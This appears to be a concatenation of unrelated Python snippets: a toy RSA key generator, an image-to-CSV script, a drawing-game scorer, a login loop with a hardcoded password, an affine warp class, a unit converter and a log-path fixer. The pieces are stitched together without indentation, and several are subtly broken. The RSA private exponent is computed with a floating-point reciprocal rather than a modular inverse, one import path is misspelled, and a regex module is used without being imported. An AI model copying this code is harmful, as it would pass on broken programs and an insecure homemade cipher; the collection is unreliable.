p = self._primeGenerator(self.bitSize) #генерируем p .1
q = self._primeGenerator(self.bitSize) #генрируем q .1
self.n = p * q #-||- q .2
phi_n = (p-1) * (q-1) #.3
if p!=q and phi_n > self.e and phi_n % self.e != 0: #.4
break
self.d = math.pow(self.e,-1) % ((p-1)*(q-1))
#e,n - open key, d - private key
print(self.n,self.d)
'''
1)декод возврщаетет 1
'''
def main():
myrsa = rsa()
print(myrsa._textToint("hello world"))
print(myrsa.rabin_miller(21, 3))
myrsa.keyGenerator()
print('hello: ',myrsa.encode("he"))
print("dehello:",myrsa.decode(myrsa.encode("he")))
if __name__ == "__main__":
main()
import doctest
doctest.testmod()
|
import sys, os
def convertToBinaryData(filename):
with open(filename, 'rb') as file:
binaryData = file.read()
return binaryData
direcotry_name = os.path.dirname(sys.argv[0])
l = [] ## initialize few lists which we will later use
oid = 0 #.
img_id = [] #.
cat_img_name =[] #.
img_type = [] #.
img_res = [] #.
img_name = [] #.
img_size = [] #.
blob_data = [] #.
x = [] #.
y = [] #.
z = [] ##
img_res_val = "960x540"
img_type_val = "png"
for subdir, dirs, files in os.walk(direcotry_name):
for file in files:
filepath = subdir + os.sep + file
cat_img = filepath.replace(subdir, "")
cat_img_name.append(cat_img)
img_res.append(img_res_val)
img_type.append(img_type_val)
img_name.append(cat_img.replace(".png",""))
img_size.append(os.path.getsize(filepath))
blob_data.append(convertToBinaryData(filepath))
e = re.findall("X\d+.", filepath) # find the x degree using regex
qewg=e[0].replace("X","").replace("_", "")
x.append(qewg)
e = re.findall("Y\d+.", filepath) # find the y degree using regex
qewg=e[0].replace("Y","").replace("_", "")
y.append(qewg)
e = re.findall("Z\d+.", filepath) # find the z degree using regex
qewg=e[0].replace("Z","").replace("_", "")
z.append(qewg)
oid = oid + 1
#print(oid)
img_id.append(oid)
data = {
"image_id" : img_id,
"image_name": img_name,
"image_size": img_size,
"image_reso": img_res, # create a data dictonary with all the lists
"image_type": img_type,
"image_BLOB": blob_data,
"X" : x,
"Y" : y,
"Z" : z,
}
import pandas as pd
dataFrame = pd.DataFrame(data) # convert data dictonary into a dataframe
dataFrame.to_csv('final.csv',encoding='utf-8') # export the dataFrame into a csv
|
"""
Contains code for score calculation and other tasks to be excuted on images
"""
from cv2 import imread, line, bitwise_and
import numpy as np
def find_mean_color(img, on_pixels = -1):
"""
Returns mean color of an image (in B, G, R).
If on_pixels are provided (non negative), then the total color is divided by this value instead of total pixels in image. This is used for calculating color of a path.
"""
if on_pixels == -1:
pixels = img.shape[0] * img.shape[1]
else:
pixels = on_pixels
mean_blue = int(np.sum(img[:, :, 0]) / pixels)
mean_green = int(np.sum(img[:, :, 1]) / pixels)
mean_red = int(np.sum(img[:, :, 2])/ pixels)
return (mean_blue, mean_green, mean_red)
def make_mask(points_array, shape = (400, 600, 3)):
"""
Returns the mask made by using the points provided from the player.
The mask consists of lines drawn by the player and is used for calculating the score.
Also returns the number of "on" pixels (pixels with white color)
"""
number_of_points = len(points_array)
mask = np.zeros(shape)
for i in range(number_of_points - 1):
line(mask, points_array[i], points_array[i+1], (255, 255, 255), 20)
total_white_color = np.sum(mask[:, :, 0])
total_on_pixels = int(total_white_color / 255.0)
return mask, total_on_pixels
def find_score(level_id, points):
"""
Calculates the score by taking the level_id and points.
"""
fileref = "app/controls/levels/" + str(level_id) + ".jpg"
level_img = imread(fileref)
mask, on_pixels = make_mask(points, shape = level_img.shape)
mask = np.array(mask, dtype = np.uint8)
result = bitwise_and(level_img, mask)
level_mean = find_mean_color(level_img)
solution_mean = find_mean_color(result, on_pixels = on_pixels)
score = 0.0
for x in range(3):
score += (level_mean[x] - solution_mean[x]) ** 2
score = int(np.sqrt(score))
print "score is : " + str(score)
return score
|
pw = 'a123456'
i = 3
while i > 0:
i = i - 1
password = input('請輸入密碼:')
if password == pw:
print('登入成功')
break
else:
print('密碼錯誤!')
if i > 0:
print('還有', i , '次機會')
else:
print('您已錯誤三次,請重設密碼!')
|
import numpy as np
from scipy.spatial import Delaunay
from .utils import fix
from .affine import affine_matrix
class MultiAffine:
def __init__(self, origin_points, new_points, triangulation=None):
for p in [(0.0, 0.0), (0.0, 1.0), (1.0, 0.0), (1.0, 1.0)]:
assert(p in origin_points)
assert(p in new_points)
if triangulation is None:
triangulation = Delaunay(new_points)
self.origin_points = np.array(origin_points)
self.new_points = np.array(new_points)
self.triangulation = triangulation
self.affines = []
for triangle in triangulation.simplices:
mat1 = affine_matrix(*self.origin_points[triangle])
mat2 = affine_matrix(*self.new_points[triangle])
affine = np.matmul(np.linalg.inv(mat2), mat1)
self.affines.append(affine)
def __call__(self, x, y, origin_width, origin_height, new_width, new_height):
nx = x / new_width
ny = y / new_height
index = self.triangulation.find_simplex((nx, ny))
assert(index != -1)
nx, ny, z = np.matmul(np.array([nx, ny, 1]), self.affines[index])
# print(x, y, nx / z * origin_width, ny / z * origin_height)
return fix(nx / z * origin_width, ny / z * origin_height, origin_width, origin_height)
|
# Mana bizdan odamni ogírligi boýiga qarab bilish kerak bulsin bunda boýning hajmi 0.45 ga ko'paytiriladi
weight_lbs=input("Weight lbs= ")
weight_kg=int(weight_lbs)*0.45
print(weight_kg)
|
import xml.tree.ELementTree as ET
|
"""
Fix the path issues in the log files.
This is for the preparation of running batch training
"""
import pandas as pd
import os
def update_df(log_file_dir):
"""
Update the file directory of each image file in driving_log.csv.
This function returns a new dataframe that has the same form as driving_log.csv.
The file name of each image file becomes: log_file_dir/IMG/XXXXXX.JPG
:param log_file_dir: the new file directory.
:return: the new dataframe
"""
def change_dir(x):
file_dir, fname = os.path.split(x)
return os.path.join(log_file_dir, 'IMG/', fname)
df = pd.DataFrame.from_csv(os.path.join(log_file_dir, 'driving_log.csv'), header=0, index_col=None)
ndf = df[['center', 'left', 'right']]
ndf = ndf.applymap(change_dir)
df[['center', 'left', 'right']] = ndf
return df
if __name__ == "__main__":
file_dir = './data/official_baseline/'
df = update_df(file_dir)
df.to_csv('new_log_file.csv', index=None)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.